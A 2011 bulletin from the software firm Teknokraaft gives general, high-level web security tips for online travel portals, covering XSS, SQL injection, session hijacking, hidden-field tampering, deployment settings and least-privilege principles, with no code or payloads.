BULLETINS 
TEKNOKRAAFT

BULLETINS

RSS Feeds

Subscribe to Bulletins

Tips for securing your Online Travel Portal

Posted Date:  January 28, 2011


Implementing the right security model is a vital part of any Online Portal and in this newsletter we hope to cover some important points related to the same.

Cross Site Scripting
CSS is a common attack in websites, consider a scenario when a user inputs a script in user input form which is not validated and stored, so when a new user visits the page or website the script popups with the message. Common attacks are to steal cookies, session information and other sensitive information.

If a malicious script is injected, it seriously affects the website. It can be tied up with a phishing attack.

SQL Injection Attacks
A SQL Injection attack is a common problem in websites, for example when a query is passed in input fields in login form, using CRUD operation against database. It is allowing the user to query the database through some input fields. If a user input text area/ field is not validated, and you are using concatenation of SQL script to load some data from database you are exposed to SQL injection attacks.

Session Hijacking
Session Hijacking is a way of hacking user’s session state. Session Hijacking is done by guessing session id or by using stolen session Id. Session Id guessing is harder because Asp.net uses 120 bit number as session id. Session hijacking is done by using different methods like cross site scripting, man in middle attack, hack user’s cookie.

Man in middle attack
Man in middle attack is a type of attack between the webserver and database. Normally the traffic between web and database server is not protected, so attacker uses this path to sniff the traffic.

Hidden field Tampering
If you allow access to sensitive information stored in hidden fields directly without validating the data coming back from user, you could be affected by tampering the hidden field by the hacker. So the values must be validated with expected values.

View state is not encrypted as it is Base 64 encoded which can be viewed by hacker. So view state should be added with a hash value which is checked in server to avoid tampering and also view state should be protected. So avoid sending sensitive information to and back to the server and client.

Deploy web application
There are various objectives to be done before deploying a website, into production environment, which can avoid some security pitfalls.

  • Tracing should be removed before deployment
  • Disable Debug mode to false
  • Custom error page should be changed to remote only

Security Principles
Some core security principles that should be followed during website development:

  • Code Access Security: Run script or execute code under a least privileged account to limit the potential damage.
  • Security in Layers: Place check points in all layers in the application which allow only authenticated and authorized users to access.
  • User Privileges: User should be assigned with least privilege, with assigned roles and which pages can be accessed.
  • Application Failure:  When the application fails, make sure it does not leave sensitive data unprotected. Don't include details that could help an attacker to exploit vulnerability in your application.
  • Application Logging: Write application and user error in error log’s, database and in Windows event log, depends upon log severity.
  • Authentication and Authorization: Restrict user access to access system level resources like files, folders, and event logs.

Last but not the least, have a proper logging mechanism that logs each and every action in your Online Travel application and store this for a minimum of 1 year. You never know when you need to take a look at an earlier transaction and see what happened etc!

Author: Pradeep M.S

Pradeep works as Sr. Software Engineer in Teknokraaft and works with our OTA team.

Back to list

    + 91 952 696 5055



Thiruvananthapuram, India

Teknokraaft Info Systems Pvt Ltd
TC 12/443, ‘Aswathy’, Plamood, Pattom P.O,
Thiruvananthapuram, Kerala. Pin Code : 695004, INDIA

Office hours: 9.00 AM to 7.00 PM (GMT + 5:30)

Mobile: + 91 952 696 5055
Landline: +91 471 230 5055/6055
Fax: +91 471 2307 0555

Skype: teknoconnect
Mail: [email protected]
contact-us